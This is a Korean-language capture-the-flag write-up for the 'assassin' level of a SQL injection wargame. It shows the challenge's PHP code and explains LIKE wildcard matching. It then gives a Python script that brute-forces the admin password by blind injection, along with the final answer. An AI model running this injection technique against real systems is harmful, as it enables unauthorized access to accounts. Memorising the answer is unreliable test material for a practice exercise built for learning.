assasin

1. Code

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/\'/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_assassin where pw like '{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
  if($result['id'] == 'admin') solve("assassin"); 
  highlight_file(__FILE__); 
?>

 

---

2. Condition

• 작은 따옴표를 필터링 한다.
• 쿼리문에 기존과 다르게 like가 사용되었다.

 

---

3. Solution

변수명	값
pw	i%

like는 %,_와 같이 특수한 문자를 통해 정확하지 않아도 값을 유추할 수 있게한다.

% : 글자수와 상관없이 모든 글자를 의미한다.

_ : 글자 하나를 의미한다.

 

 

쉽게 설명하자면 아래 표와 같다. 서로 같은 값이다.

원문	like 인자
ch4n	%
w00ng	w%
yee	%e
What	W_at
A$AP	A$A_

 

 

시작하기전, 모든 여러 ascii값을 넣어봤지만 Hello guest만 나오는 것을 보고, guest와 admin의 pw는 겹치는 부분이 있다고 판단하였다.

 

python 스크립트를 이용하여 "Hello guest"가 나오는 pw를 임시로 저장해두고, "Hello admin"이 나올때 까지 루프시켰다.

 

 

---

4. Injection

우선, python 코드는 다음과 같이 짜봤다.

import requests

cookie = {'PHPSESSID' : '~~~~'}
find_ad = 0
pw_plz = ""

for i in range(10):
    for j in range(48, 123):
        if j == 37 or j == 95:
            continue
            
        url = "https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw="+pw_plz+"%s%%" % chr(j)
        res = requests.get(url, cookies=cookie)

        if "Hello admin" in res.text:
            print(url.split('?')[1],"-> admin")
            pw_plz += chr(j)
            find_ad = 1
            break

        elif "Hello guest" in res.text:
            print(url.split('?')[1],"-> guest")
            pw_plz += chr(j)
    
    if find_ad:
        print("\nadmin pw : %s%%" % pw_plz)
        break

 

 

성공적으로 결과 값이 나온다.

img_1 script output

 

변수명	값
pw	902%